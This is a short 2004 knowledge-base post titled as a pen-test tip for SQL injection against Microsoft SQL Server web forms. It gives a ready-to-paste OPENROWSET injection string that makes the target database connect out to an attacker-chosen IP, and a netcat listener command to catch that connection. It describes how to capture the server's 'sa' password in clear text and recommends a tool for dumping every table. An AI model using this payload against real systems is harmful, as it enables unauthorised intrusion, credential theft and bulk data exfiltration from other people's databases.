Unifix knowledge database - The original one

Dashboard - News - Search - List - About - Admin


Pen test, SQL Injection

Author:mike - Wed Jan 7 15:23:30 2004

Here's the string you can drop in web form inputs to see if they're vulnerable to
SQL injection (on Microsoft SQL server anyway):

'; select * from OPENROWSET('SQLOLEDB','192.168.0.1';;,'select @@version')--

To verify results, replace the IP address w/ that of the machine you're testing from,
and use netcat (attached) to listen on port 1433 with the following syntax:

nc -vvv -l -p 1433

If the test is successful, you should see a connection and some garbage characters
in the netcat window.  This type of attack is particularly heinous to customers
running Microsoft SQL Server 7/2000.  If you replace the 'select @@version' with
another command, you can cause the remote database to try and connect using its
own 'sa' user and password in clear text and capture it with a sniffer.

IF you want to get REALLY tricky, download 'data thief v1.0' and dump all of their
tables in a handy GUI format.

http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf


Copyright(c) Unifix.org 2002-2011


Dashboard - News - Search - List - About - Admin
 
Powered by Mikjaer Consulting Solutions - Hosted by Specialhosting.dk